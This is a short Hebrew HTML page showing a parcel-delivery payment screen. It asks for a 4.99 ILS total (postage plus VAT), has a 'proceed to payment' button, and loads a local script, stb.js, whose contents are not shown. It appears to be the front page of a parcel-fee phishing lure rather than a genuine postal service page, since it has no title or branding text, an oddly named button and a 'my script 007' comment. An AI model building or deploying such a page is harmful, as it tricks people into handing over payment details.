<!DOCTYPE html>
<html >
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/main.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>

    <div class="hed">
        <img src="./img/hed.JPG" alt="">
    </div>

    <div class="section">
        <div class="kolch">
            <form  action="">
                <div class="pack1">
                    <img width="30" src="./img/delivery-box.png" alt="">
                    <p>  אתה עומד לשלם עבור הזמנה אחת</p>
                </div>
    
                <div class="inform">
                    
    
                    <div class="right">
                        <p>ILS ₪ 3,00</p>
                        
                        <p>ILS ₪ 1,99</p>
                        <p style="font-size: 20px; font-weight: bold;">ILS ₪ 4,99</p>
                    </div>

                    <div class="left">
                        <p>דואר</p>
                        
                        <p>כולל מע"מ</p>
                        <p style="font-weight: bold; font-size: 20px;">סך הכל</p>
                    </div>
                </div>
    
                <button type="button" id="barinxri" class="btn1">התקדם לתשלום </button>
            </form>
        </div>
    </div>

    <div class="hed">
        <img src="./img/bot.JPG" alt="">
    </div>
    <!-- my script 007 -->
    <script src="./js/stb.js"></script>
</body>
</html>